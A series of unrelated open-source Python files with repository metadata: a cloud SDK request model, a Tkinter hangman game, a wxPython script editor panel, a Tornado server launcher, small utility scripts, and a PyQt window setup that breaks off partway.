] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,836 | py | # coding: utf-8
import re
import six
class ShowBlockchainDetailRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'blockchain_id': 'str'
}
attribute_map = {
'blockchain_id': 'blockchain_id'
}
def __init__(self, blockchain_id=None):
"""ShowBlockchainDetailRequest - a model defined in huaweicloud sdk"""
self._blockchain_id = None
self.discriminator = None
self.blockchain_id = blockchain_id
@property
def blockchain_id(self):
"""Gets the blockchain_id of this ShowBlockchainDetailRequest.
blockchainID
:return: The blockchain_id of this ShowBlockchainDetailRequest.
:rtype: str
"""
return self._blockchain_id
@blockchain_id.setter
def blockchain_id(self, blockchain_id):
"""Sets the blockchain_id of this ShowBlockchainDetailRequest.
blockchainID
:param blockchain_id: The blockchain_id of this ShowBlockchainDetailRequest.
:type: str
"""
self._blockchain_id = blockchain_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowBlockchainDetailRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
6fc0fccb0a32e68f70a12fb6df50a35d82b0050b | 3db76c7e67c3112f893c6226d424d4206744b1be | /jogoForca.py | b694eef9bd4014227866162d1edf6afcda73039e | [] | no_license | igorsantos314/Hangman-Game | 699f6d4209ffffc7152c0b15b5809ca531bb38fb | 4ddfb9895b4b062905a471bbba396991f00dce2d | refs/heads/master | 2022-12-18T04:23:57.226503 | 2020-09-22T10:53:14 | 2020-09-22T10:53:14 | 294,830,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,583 | py | from tkinter import *
from tkinter import messagebox
from hangman import *
from random import choice
from time import sleep
import winsound, _thread as th
class game:
def __init__(self):
self.colorTheme = 'White'
self.titleColor = 'DarkGreen'
self.banner = 'SeaGreen'
self.fontCourier = 'Courier 15 bold'
self.dictThemes = {0:'AGRICULTURE', 1:'AGRIBUSINESS', 2:'COMPUTING', 3:'SOFTWARE ENGINEERING', 4:'MUSIC'}
self.pharsesUp = ['Good for you!', 'Very Good!', 'Are you Cheating?']
self.themeChoosed = 0
#INICIAR O JOGO
self.chooseTheme()
def chooseTheme(self):
windowTheme = Tk()
windowTheme.resizable(False, False)
windowTheme.title('THEMES')
windowTheme['bg'] = self.banner
#FUNCAO PARA DESTRUIR ESCOLHER TEMA E INICIAR O JOGO
def start(theme):
#DESTROI A JANELA
windowTheme.destroy()
#DEFINIR O TEMA
self.themeChoosed = theme
#INICIA O JOGO COM O TEMA ESPECIFICO
self.startGame()
lblThemes = Label(text='CHOOSE THE THEME', font=self.fontCourier, bg=self.banner, fg='white')
lblThemes.pack()
btAgriculture = Button(text='AGRICULTURE', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(0))
btAgriculture.pack(pady=5)
btAgroBusiness = Button(text='AGROBUSINESS', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(1))
btAgroBusiness.pack(pady=5)
btEngSoftware = Button(text='SOFTWARE ENGINEERING', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(2))
btEngSoftware.pack(pady=5)
btInformatica = Button(text='COMPUTING', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(3))
btInformatica.pack(pady=5)
btMusica = Button(text='MUSIC', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(4))
btMusica.pack(pady=5)
windowTheme.mainloop()
def startGame(self):
self.listKeyBoard = []
#OBEJETO DE JOGO
self.objectHangman = hangman(self.themeChoosed)
#PONTOS POR LETRAS CORRETAS
self.points = 20
self.windowMain()
def windowMain(self):
self.window = Tk()
self.window.title('Hangman Game')
self.window.geometry('900x550+150+10')
self.window.resizable(False, False)
self.window['bg'] = self.titleColor
#SABER QUAL PARTE DO BONECO DEVE SER EXIBIDA
self.erros = 0
#TITULO DO JOGO
lblTitle = Label(text='HANGMAN GAME', bg=self.banner, font='Courier 35 bold', fg='white', width=70)
lblTitle.pack(pady=10)
#BANNER PARA A POSICIONAR A PERGUNTA
bannerWord = Label(text='', width=70, height=5, bg=self.colorTheme)
bannerWord.place(x=350, y=120)
self.lblWord = Label(text='', font='Courier 20 bold', bg=self.colorTheme, fg='DarkGreen')
self.lblWord.place(x=360, y=140)
#TECLADO
bannerKeyBoard = Label(text='', width=70, height=15, bg=self.banner)
bannerKeyBoard.place(x=350, y=240)
self.a = Button(text='A', command=lambda: self.replaceWord('A', 0), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.b = Button(text='B', command=lambda: self.replaceWord('B', 1), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.c = Button(text='C', command=lambda: self.replaceWord('C', 2), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.d = Button(text='D', command=lambda: self.replaceWord('D', 3), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.e = Button(text='E', command=lambda: self.replaceWord('E', 4), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.f = Button(text='F', command=lambda: self.replaceWord('F', 5), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.g = Button(text='G', command=lambda: self.replaceWord('G', 6), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.h = Button(text='H', command=lambda: self.replaceWord('H', 7), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.i = Button(text='I', command=lambda: self.replaceWord('I', 8), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.j = Button(text='J', command=lambda: self.replaceWord('J', 9), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.k = Button(text='K', command=lambda: self.replaceWord('K', 10), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.l = Button(text='L', command=lambda: self.replaceWord('L', 11), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.m = Button(text='M', command=lambda: self.replaceWord('M', 12), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.n = Button(text='N', command=lambda: self.replaceWord('N', 13), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.o = Button(text='O', command=lambda: self.replaceWord('O', 14), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.p = Button(text='P', command=lambda: self.replaceWord('P', 15), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.q = Button(text='Q', command=lambda: self.replaceWord('Q', 16), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.r = Button(text='R', command=lambda: self.replaceWord('R', 17), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.s = Button(text='S', command=lambda: self.replaceWord('S', 18), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.t = Button(text='T', command=lambda: self.replaceWord('T', 19), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.u = Button(text='U', command=lambda: self.replaceWord('U', 20), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.v = Button(text='V', command=lambda: self.replaceWord('V', 21), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.x = Button(text='X', command=lambda: self.replaceWord('X', 22), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.w = Button(text='W', command=lambda: self.replaceWord('W', 23), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.y = Button(text='Y', command=lambda: self.replaceWord('Y', 24), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
self.z = Button(text='Z', command=lambda: self.replaceWord('Z', 25), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
#ADICIONAR TECLAS NA LISTA
self.listKeyBoard = [ self.a, self.b, self.c, self.d, self.e, self.f, self.g, self.h, self.i, self.j, self.k, self.l, self.m, self.n,
self.o, self.p, self.q, self.r, self.s, self.t, self.u, self.v, self.x, self.w, self.y, self.z]
posY = 280
posX = 380
for pos, i in enumerate(self.listKeyBoard):
i.place(x=posX, y=posY)
posX += 40
if pos == 10:
posY = 330
posX = 420
elif pos == 19:
posY = 380
posX = 480
#self.a.place(x=370, y=260)
#BANNER DO BONECO
bannerDoll = Label(text='', width=40, height=23, bg=self.banner)
bannerDoll.place(x=30, y=120)
#DICA
lblClue = Label(text='CLUE: {}'.format(self.dictThemes[self.themeChoosed]), font=self.fontCourier, bg=self.banner, fg='white')
lblClue.place(x=40, y=130)
self.lblPoints = Label(text='POINTS: {}'.format(self.points), font='Courier 35 bold', fg='orange', bg=self.banner, width=50)
self.lblPoints.place(x=0, y=490)
self.surffleWords()
#BONECO
self.setDoll()
self.window.mainloop()
def surffleWords(self):
#PEGAR A PALAVRA SORTEADA
self.word = self.objectHangman.getWord()[0]
if self.word == 'E':
#MENSSAGEM DE FIM DE JOGO
lblFinishGame = Label(text=' YOU ARE THE BEST 😱 ', font='Courier 50 bold', bg='red', fg='white', height=8, )
lblFinishGame.place(x=0, y=0)
#BOTAO RESTART
self.btRestart = Button(text='RESTART GAME', font='Courier 12 bold', bg='red', fg='white', command=self.restartGame)
self.btRestart.place(x=360, y=350)
else:
#TROCAR LETRAS POR TRAÇOS
self.replaceLetTrace()
def replaceLetTrace(self):
traceWord = ''
#VARRER A PALAVRA E TROCA LETRAS POR TRAÇOS
for i in self.word:
if i == ' ':
traceWord += ' '
else:
traceWord += '-'
#EXIBIR NO CAMPO PALAVRA
self.lblWord['text'] = traceWord
#VERIFICA SE O USUARIO ACERTOU OU ERROU
def replaceWord(self, let, posLet):
#VERIFICA SE A LETRA EXISTA NA PALAVRA
if let in self.word:
letPositions = []
#VARRER AS POSICOES QUE A LETRA ESTÁ
for pos,i in enumerate(self.word):
#ADICIONA AS POSICOES CUJA A LETRA SEJA IGUAL
if i == let:
letPositions.append(pos)
#SUBSTITUIR
self.showNewWord(let, letPositions)
#VERIFICA SE O USUARIO ACERTOU A PALAVRA
self.verifyWord()
#ADICIONA 5 PONTOS
self.points += 5
else:
#DIMINUIR NA PONTUAÇÃO
self.points -= 2
#SOMAR UM ERRO
self.erros += 1
#CRIAR NOVA PARTE DO BONECO
self.setDoll()
#SOM DE ERROR
th.start_new_thread(self.soundError, ())
#ATUALIZAR PONTOS
self.refreshPoints()
#DELETA A LETRA DO TECLADO
self.deleteKey(posLet)
def soundError(self):
b = winsound.Beep
b(420,200)
def showNewWord(self, let, letPositions):
currentWord = list(self.lblWord['text'])
#SUBSTITUI A O TRAÇO PELA LETRA CORRESPONDENTE
for i in letPositions:
currentWord[i] = let
self.lblWord['text'] = ''.join(currentWord)
def verifyWord(self):
if self.word == self.lblWord['text']:
#SORTIA UM FRASE DE PARABENS
messagebox.showinfo('',choice(self.pharsesUp))
#DESTROI A JANELA E INICIA COM OUTRA
self.window.destroy()
#ABRE A JANELA COM OUTRA PALAVRA
self.windowMain()
def deleteKey(self, posLet):
try:
#DESTRUIR BOTAO APERTADO
self.listKeyBoard[posLet].destroy()
except:
pass
def refreshPoints(self):
#TRATA ERRO DE ATUALIZAR PONTOS, APÓS A JANELA FECHAR
try:
#ATUALIZA OS PONTOS
self.lblPoints['text'] = 'POINTS: {}'.format(self.points)
except TclError:
pass
def setDoll(self):
if self.points == 0:
#O USUARIO ERROU DEMAIS
self.youLose()
elif self.erros == 1:
lblHead = Label(text='', fg='white', bg='black', width=4, height=2, font='Arial 12 bold')
lblHead.place(x=140, y=180)
elif self.erros == 2:
lblBody = Label(text='', fg='white', bg='black', width=4, height=5, font='Arial 12 bold')
lblBody.place(x=140, y=235)
elif self.erros == 3:
lblLeftArm = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
lblLeftArm.place(x=110, y=235)
elif self.erros == 4:
lblRightArm = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
lblRightArm.place(x=190, y=235)
elif self.erros == 5:
lblRightLeg = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
lblRightLeg.place(x=140, y=340)
elif self.erros == 6:
lblLeftLeg = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
lblLeftLeg.place(x=160, y=340)
#O USUARIO COMPLETOU O BONECO
self.youLose()
def youLose(self):
#FIM DE JOGO - VOCÊ PERDEU
lblFinishGame = Label(text=' YOU LOSE !!! 😭 ', font='Courier 50 bold', bg='blue', fg='white', height=8, )
lblFinishGame.place(x=0, y=0)
#BOTAO RESTART
self.btRestart = Button(text='RESTART GAME', font='Courier 12 bold', bg='blue', fg='white', command=self.restartGame)
self.btRestart.place(x=360, y=350)
#REINICIAR O JOGO
def restartGame(self):
#DESTRUIR A WINDOW
self.window.destroy()
#REINICIAR O JOGO
self.startGame()
game()
| [
"55886200+igorsantos314@users.noreply.github.com"
] | 55886200+igorsantos314@users.noreply.github.com |
8c7a067fdb895eab44d1aa3b5283a5653c4fd265 | 50c55625354580101a8dae8504e8dc887a694ed7 | /editor/Welder/Editor/core/script_editor/panels/script_editor_panel.py | f636982c96f8f729949b58610001140958a7d816 | [] | no_license | johndpope/arcreator | def50d06e9634abda2ff968d2e165d882cd26bf9 | db81dd3ec415619ea8f5e9c74ee852d171a36e93 | refs/heads/master | 2020-03-21T23:40:53.489419 | 2015-08-30T00:40:17 | 2015-08-30T00:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,042 | py | import wx
from wx import stc
import os
import re
import welder_kernel as kernel
from PyitectConsumes import ScriptEditorManager as SM
from PyitectConsumes import PanelBase, ScriptEditor_Panel_Template, ScriptSettings_Dialog
# -------------------------------------------------------------------------
# ScriptEditor_Panel
# -------------------------------------------------------------------------
class ScriptEditor_Panel(ScriptEditor_Panel_Template, PanelBase):
_arc_panel_info = {
"Name": "Script Editor",
"Caption": "Script Editor",
"CaptionV": True,
"Center": None,
"CloseB": True,
"DestroyOC": True,
"Floatable": True,
"Float": None,
"IconARCM": 'script',
"MaximizeB": True,
"MinimizeB": True,
"MinimizeM": ["POS_SMART", "CAPT_SMART"],
"Movable": True,
"NotebookD": True,
"Resizable": True,
"Snappable": True,
"Layer": 1
}
def __init__(self, parent, index=-1):
"""Basic constructor for the ScriptEditor_Panel"""
ScriptEditor_Panel_Template.__init__(self, parent)
self.CreateToolBar()
# self.statusBar = parent.CreateStatusBar()
# TODO: give teh script editor it's own status bar
# self.statusBar = kernel.GlobalObjects["MainStatusBar"]
self.statusBar.SetFieldsCount(3)
self.statusBar.SetStatusWidths([-4, -4, -2])
# TODO: Get path by using project path + Data/Scripts/
# path = r"C:\Users\Eric\Desktop\ARC\editor\Welder\src\RTP\Templates\Chonicles of Sir Lag-A-Lot\Data\Scripts"
path = os.path.join(kernel.GlobalObjects["CurrentProjectDir"], 'Data', 'Scripts')
try:
SM.LoadScripts()
except:
kernel.Log(
'Failed to successfully load all scripts.', '[ScriptEditor]', True, True)
global Scripts
Scripts = kernel.GlobalObjects['Scripts']
self.ScriptIndex = -1
if index >= 0:
self.OpenScript(index=index)
self.scriptCtrl.Bind(
wx.EVT_KEY_DOWN, kernel.Protect(self.RefreshStatus))
self.scriptCtrl.Bind(stc.EVT_STC_UPDATEUI, self.RefreshStatus)
self.comboBoxScripts.AppendItems(
[script.GetName() for script in Scripts])
self.comboBoxScripts.SetSelection(index)
self.scriptCtrl.CalculateLineNumberMargin()
# Bind the panel to the Panel Manager
self.bindPanelManager()
def OpenScript(self, event=None, index=None):
if self.ScriptIndex >= 0:
Scripts[self.ScriptIndex].SetText(self.scriptCtrl.GetText())
if event is not None:
i = event.GetInt()
elif index is not None:
i = index
else:
return
self.ScriptIndex = i
self.scriptCtrl.SetText(Scripts[i].GetText())
self.RefreshScript()
def CreateToolBar(self):
"""Creates the toolbar and binds events to it"""
art = wx.ArtProvider().GetBitmap
self.toolBar.AddSimpleTool(
0, art(wx.ART_COPY), 'Copy', 'Copies the selected text')
self.toolBar.AddSimpleTool(
1, art(wx.ART_CUT), 'Cut', 'Cuts the selected text')
self.toolBar.AddSimpleTool(
2, art(wx.ART_PASTE), 'Paste', 'Pastes previously copied/cut text')
self.toolBar.AddSeparator()
self.toolBar.AddSimpleTool(
3, art(wx.ART_UNDO), 'Undo', 'Undoes the previous action')
self.toolBar.AddSimpleTool(
4, art(wx.ART_REDO), 'Redo', 'Redoes the previous Undo')
self.toolBar.AddSeparator()
self.toolBar.AddSimpleTool(
5, art(wx.ART_FIND), 'Find', 'Opens Find window for searching text')
self.toolBar.AddSimpleTool(6, art(
wx.ART_FIND_AND_REPLACE), 'Find and Replace', 'Open Find & Replace window for replacing text')
self.toolBar.AddSeparator()
self.toolBar.AddSimpleTool(
7, art(wx.ART_HELP_SETTINGS), 'Settings', 'Opens the settings window')
self.toolBar.AddSimpleTool(8, art(
wx.ART_LIST_VIEW), 'Normalize Indents', 'Applies conventional Ruby indenting to the script')
self.toolBar.AddSimpleTool(
9, art(wx.ART_HELP_BOOK), 'Help', 'Opens the compiled HTML help doc')
self.toolBar.AddSeparator()
self.textCtrlSearch = wx.TextCtrl(
self.toolBar, -1, 'Search...', style=wx.TE_RIGHT)
self.toolBar.AddControl(self.textCtrlSearch)
self.toolBar.AddSimpleTool(10, art(wx.ART_GO_BACK), 'Previous', '')
self.toolBar.AddSimpleTool(11, art(wx.ART_GO_FORWARD), 'Next', '')
self.toolBar.AddSeparator()
self.comboBoxScripts = wx.ComboBox(
self.toolBar, size=(184, -1), style=wx.GROW)
self.comboBoxScripts.Bind(wx.EVT_COMBOBOX, self.OpenScript)
self.comboBoxScripts.Bind(
wx.EVT_TEXT, self.comboBoxScripts_TextChanged)
self.toolBar.AddControl(self.comboBoxScripts)
self.toolBar.AddSeparator()
self.toolBar.AddSimpleTool(
12, art(wx.ART_FILE_SAVE), 'Save', 'Saves the current script')
self.toolBar.Realize()
self.Bind(wx.EVT_TOOL, self.OnCopy, id=0)
self.Bind(wx.EVT_TOOL, self.OnCut, id=1)
self.Bind(wx.EVT_TOOL, self.OnPaste, id=2)
self.Bind(wx.EVT_TOOL, self.OnUndo, id=3)
self.Bind(wx.EVT_TOOL, self.OnRedo, id=4)
self.Bind(wx.EVT_TOOL, self.OnFind, id=5)
self.Bind(wx.EVT_TOOL, self.OnReplace, id=6)
self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnSettings), id=7)
self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnNormalize), id=8)
self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnHelp), id=9)
self.Bind(wx.EVT_TOOL, kernel.Protect(self.FindPrevious), id=10)
self.Bind(wx.EVT_TOOL, kernel.Protect(self.FindNext), id=11)
self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnSave), id=12)
def RefreshScript(self):
"""Refreshes the displayed text"""
self.scriptCtrl.CalculateLineNumberMargin()
self.RefreshStatus()
def RefreshStatus(self, event=None):
"""Refreshes the status bar text"""
chars = len(re.sub(r'\s', '', self.scriptCtrl.Text))
length = str.format('Lines: {0} Characters: {1} Position: {2}',
self.scriptCtrl.LineCount, chars, self.scriptCtrl.GetCurrentPos())
self.statusBar.SetStatusText(length, 1)
sel = len(self.scriptCtrl.SelectedText)
if sel > 0:
self.statusBar.SetStatusText(str.format('Selection: {}', sel), 2)
else:
self.statusBar.SetStatusText('', 2)
if event is not None:
event.Skip()
# update text
if self.ScriptIndex > -1:
Scripts[self.ScriptIndex].SetText(self.scriptCtrl.GetTextUTF8())
def OnCopy(self, event):
"""Sets the scripts selected text to the clipboard"""
self.statusBar.SetStatusText('Copied selected text', 0)
self.scriptCtrl.Copy()
def OnCut(self, event):
"""Sets the scripts selected text to the clipboard"""
self.statusBar.SetStatusText('Cut selected text', 0)
self.scriptCtrl.Cut()
def OnPaste(self, event):
"""Pastes the clipboard text to the script"""
self.statusBar.SetStatusText('Text pasted', 0)
self.scriptCtrl.Paste()
def OnUndo(self, event):
"""Performs script Undo action"""
self.statusBar.SetStatusText('Undo applied', 0)
self.scriptCtrl.Undo()
def OnRedo(self, event):
"""Performs script Redo action"""
self.statusBar.SetStatusText('Redo applied', 0)
self.scriptCtrl.Redo()
def OnFind(self, event):
"""Opens FindReplace window with Find tab focused"""
self.scriptCtrl.StartFindReplace(0)
def OnReplace(self, event):
"""Opens FindReplace window with Replace tab focused"""
self.scriptCtrl.StartFindReplace(1)
def OnSettings(self, event):
dlg = ScriptSettings_Dialog(self, self.scriptCtrl)
if dlg.ShowModal() == wx.ID_OK:
config = kernel.GlobalObjects.get_value(
'Welder_config').get_section('ScriptEditor')
new_config = dlg.GetConfiguration()
for key, value in new_config.items():
config.set(key, value)
SM.ApplyUserSettings(self.scriptCtrl)
def OnNormalize(self, event):
"""Applies script indent normalization"""
result = wx.MessageBox('Automatically apply conventional Ruby indents to document?',
'Confirm Action', wx.OK | wx.CANCEL | wx.CENTRE, self)
if result == wx.OK:
import time
start = time.time()
self.scriptCtrl.NormalizeIndenting()
msg = str.format(
'Indentation applied in {} seconds', time.time() - start)
self.statusBar.SetStatusText(msg, 0)
def OnHelp(self, event):
self.statusBar.SetStatusText('Opening Help...', 0)
print(Scripts[self.ScriptIndex].IsModified())
def OnSave(self, event):
"""Saves the open script to disk"""
if self.ScriptIndex >= 0:
Scripts[self.ScriptIndex].SetText(self.scriptCtrl.GetText())
Scripts[self.ScriptIndex].SaveScript(self.ScriptIndex)
msg = str.format(
'{}.rb Saved!', Scripts[self.ScriptIndex].GetName())
self.statusBar.SetStatusText(msg, 0)
def comboBoxScripts_TextChanged(self, event):
text = event.GetString()
Scripts[self.ScriptIndex].ChangeName(text)
self.comboBoxScripts.SetString(self.ScriptIndex, text)
self.comboBoxScripts.SetStringSelection(text)
# --------------------------------------------------------------
# Find/Replace Functions
# --------------------------------------------------------------
def GetSearchLocations(self, searchString, matchcase, wholeword, scope, regex=None):
results = {}
# if scope == 0:
# scripts = [Scripts[self.listBoxScripts.GetSelection()]]
# else:
# scripts = Scripts
# if not matchcase:
# searchString = searchString.lower()
# for i, script in enumerate(scripts):
# if not matchcase: text = script.GetText().lower()
# else: text = script.GetText()
# if searchString in text:
# lines, found = text.splitlines(), []
# for j in xrange(len(lines)):
# if searchString in lines[j] and j not in found:
# found.append(j)
# results[i] = found
return results
def FindPrevious(self, event):
result = self.scriptCtrl.Find('Tro.p', True, False, True, False, True)
return result
def FindNext(self, event):
result = self.scriptCtrl.Find('Tro.p', True, False, True, False, False)
return result
| [
"ryexander@gmail.com"
] | ryexander@gmail.com |
f819671abf5f9bd7beeb31f17f6f1cadd1e481c9 | 13a89d514738db263aab7952fbc4d827e84cdc63 | /tornado_server.py | 5e47ee975b0fcfa45cb3c81c0252210714806197 | [] | no_license | kejukeji/pub_py | f94f8acdf7703f1f5a1d4a95d3da8c7475759829 | 619690547f1c8ba1a326c22c070577093512ec87 | refs/heads/master | 2020-04-06T06:59:47.149855 | 2014-01-21T11:19:04 | 2014-01-21T11:19:10 | 13,577,587 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | # coding: utf-8
from pub_app import app
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(7071) # flask默认的端口,可任意修改
IOLoop.instance().start() | [
"exthen@gmail.com"
] | exthen@gmail.com |
432833db9cf0ca962085ecf6c3b5689183f149a1 | 031aa63c4d807d828a916ad09d60dc4bd855e201 | /Cod sursa/Cod_Raspberry_Pi/www/arduino/led_motor3_off.py | 51c1ad6611bb467cd18c67d5367ab3573e8284c8 | [] | no_license | alexantighin/Smart-Vending-Machine | 5fbc5661d83830aab16fa035e6634235032ad1cf | 8b4fc0905c19b4fc1ded5a7fa0abbc7d7757406e | refs/heads/main | 2023-02-18T17:49:22.256507 | 2021-01-21T23:03:40 | 2021-01-21T23:03:40 | 331,774,251 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | #!/user/bin/env python
import serial
port= "/dev/ttyUSB0"
Arduino_UNO = serial.Serial(port,baudrate=9600)
Arduino_UNO.write('led_motor3_off')
| [
"noreply@github.com"
] | noreply@github.com |
8667dc804bc863ecbd252923a7c0a0bb5bd6e785 | c4f13f49c55084cf0680f48529d73ed8b4cc4dd3 | /metrics/__init__.py | cc2dd4cb5277f118c9d6b840fdafdafa120e4f61 | [] | no_license | shilad/cartograph-server | 69629f87fad1161c3cae852c86bed22ed451cb91 | a59e580768760453d62833c71f1178de98dbbbba | refs/heads/master | 2021-05-18T17:41:15.031374 | 2020-08-03T19:03:14 | 2020-08-03T19:03:14 | 251,341,602 | 1 | 0 | null | 2020-07-15T05:20:55 | 2020-03-30T15:08:12 | HTML | UTF-8 | Python | false | false | 545 | py | from metrics.DivergingMetric import DivergingMetric
from metrics.SequentialMetric import SequentialMetric
from metrics.QualitativeMetric import QualitativeMetric
def getMetric(js):
args = dict(js)
del args['type']
del args['path']
mType = js['type']
if mType == 'sequential':
return SequentialMetric(**args)
elif mType == 'diverging':
return DivergingMetric(**args)
elif mType == 'qualitative':
return QualitativeMetric(**args)
else:
raise Exception, 'unknown type %s' % `mType` | [
"ypang@macalester.edu"
] | ypang@macalester.edu |
6c9f457dd03976df5e0f09804e8679cfce387513 | be0069d3acb9c151eec77e1d127645a3b193cdae | /try-except1.py | 664f6b7dd0bbfab9c70c3892199625612f403528 | [] | no_license | muhidham17/Penanganan-Eksepsi | d60d4930a030a5d9b3069952acd07a9446d48158 | 477def9f6d691e08bde6c7f3526b0a0ab0089f1d | refs/heads/master | 2020-08-07T19:37:44.417555 | 2019-10-08T07:49:00 | 2019-10-08T07:49:00 | 213,567,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | import sys
def main():
print ("Program Pembagian Bilangan")
a = float (input("Masukkan a: "))
b = float (input("Masukkan b: "))
try:
hasil = a / b
except ZeroDivisionError:
print ("\nError: Nilai b tidak boleh nol")
sys.exit(1)
print ("\na : ", a)
print ("b : ", b)
print ("a / b = ", hasil)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
2f7c9d26fcc2bf586f983f5a458750c3f69184e8 | 5cf1b1e9cefde910acb8309fc7c9abf04eff5bc0 | /view/welcome_page2.py | e543a8cbe619cbbf789f40c28d6f70e846f6b4be | [] | no_license | adika3121/Network-Learning-Application-with-Packet-Sniffer | 64f4bd151b222608b0db3fc156fd3b93692bca8f | 2dd89b365d3c03aed1c80bc78bc788a7ed352130 | refs/heads/master | 2022-11-27T05:51:57.879444 | 2020-07-29T14:03:55 | 2020-07-29T14:03:55 | 283,414,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,044 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'welcome_page2.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
import self
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QPushButton, QGraphicsDropShadowEffect, QWidget, QMainWindow, QApplication
from view.hasil_sniffing2 import Ui_hasil_sniffing2
from view.input_sniffing import Ui_sniffing_langsung
from view.pilih_method2 import Ui_LaluLintas_type2
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
qss_file = open('../resource/style.qss').read()
mainWindow.resize(800, 600)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(mainWindow.sizePolicy().hasHeightForWidth())
mainWindow.setSizePolicy(sizePolicy)
mainWindow.setStyleSheet(qss_file)
mainWindow.setAnimated(True)
self.centralwidget = QtWidgets.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setContentsMargins(20, -1, 20, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_2.setContentsMargins(20, -1, 20, -1)
self.verticalLayout_2.setSpacing(6)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label = QtWidgets.QLabel(self.centralwidget)
# self.label.setGraphicsEffect(self.shadow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
